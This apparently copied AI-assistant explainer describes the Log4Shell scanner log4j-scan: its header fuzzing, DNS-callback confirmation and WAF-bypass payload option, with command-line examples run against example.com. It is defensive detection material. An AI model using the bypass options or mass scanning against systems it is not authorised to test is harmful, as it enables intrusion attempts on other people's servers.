log4j-scan is an automated, open-source vulnerability scanner developed by FullHunt to detect the critical Log4Shell vulnerability (CVE-2021-44228). It operates as an offensive-security style network scanner that identifies vulnerable endpoints by actively fuzzing requests and tracking Out-of-Band (OOB) DNS callbacks. 🛡️ Key Features of log4j-scan
Unlike basic detection scripts, log4j-scan was built to replicate actual attacker behavior to find exposed applications across complex environments.
Massive Header Fuzzing: Tests more than 60 different HTTP request headers (including User-Agent, X-Forwarded-For, and Referer) rather than just checking standard inputs.
Data Parameter Support: Automates payload injection into HTTP POST data and raw JSON parameters.
DNS Callback Validation: Utilizes platforms like interact.sh or dnslog.cn to catch successful lookups, providing zero false-positive confirmation.
WAF Bypassing: Includes modular payload variations specifically designed to sneak past weak Web Application Firewall regex protections. 🚀 Basic Usage and Syntax
The scanner is written in Python and is highly configurable. Below are the primary ways to run it via the CLI: 1. Scan a Single URL
To test a single web application using default GET request headers: python3 log4j-scan.py -u https://example.com Use code with caution. 2. Scan a List of Targets
To check a large list of web properties simultaneously, feed a text file containing one URL per line: python3 log4j-scan.py -l urls.txt Use code with caution. 3. Fuzz POST Requests and Run All Tests
By default, the tool sends GET requests. You can force it to switch methods and exhaustively test every available injection point:
python3 log4j-scan.py -u https://example.com –request-type post –run-all-tests Use code with caution. 4. Bypass WAF and Use a Custom DNS Host
If your infrastructure sits behind a firewall, use the bypass payloads combined with your own controlled DNS server to catch the callback:
python3 log4j-scan.py -u https://example.com –waf-bypass –custom-dns-callback-host my-dns-server.com Use code with caution. ⚙️ Command-Line Arguments Overview -u, –url Targets a specific single web address. -l, –list Targets multiple web addresses from a loaded file. –request-type Sets HTTP method (get or post)—Defaults to get. –waf-bypass Appends obfuscated payloads to bypass firewalls. –run-all-tests
Instructs the tool to execute all permutations on each target. –dns-callback-provider Swaps default tracking host (e.g., interact.sh, dnslog.cn). ⚠️ Limitations to Keep in Mind
While excellent for perimeter networks, log4j-scan has structural limitations:
Network-Only Visibility: It can only find Log4j instances tied directly to an accessible web interface. It cannot find dormant, un-executed, or offline libraries buried deep within local servers.
Requires Outbound Network Traffic: If the server is vulnerable but blocked from initiating outbound connections via firewall policies, the tool will not record a DNS call.
Alternative Tools: For deep file-system or source-code scanning, security teams rely on tools like Logpresso’s Log4j Scanner or native OS utilities.
If you are currently setting up a vulnerability scan, please let me know:
Are you planning to scan external public web servers or internal filesystems?
Do you have an established out-of-band DNS listener ready to intercept callbacks?
Do you need assistance mapping out a full remediation or patching strategy?
Log4j vulnerability: what is it and how to detect it? – Intruder.io
Leave a Reply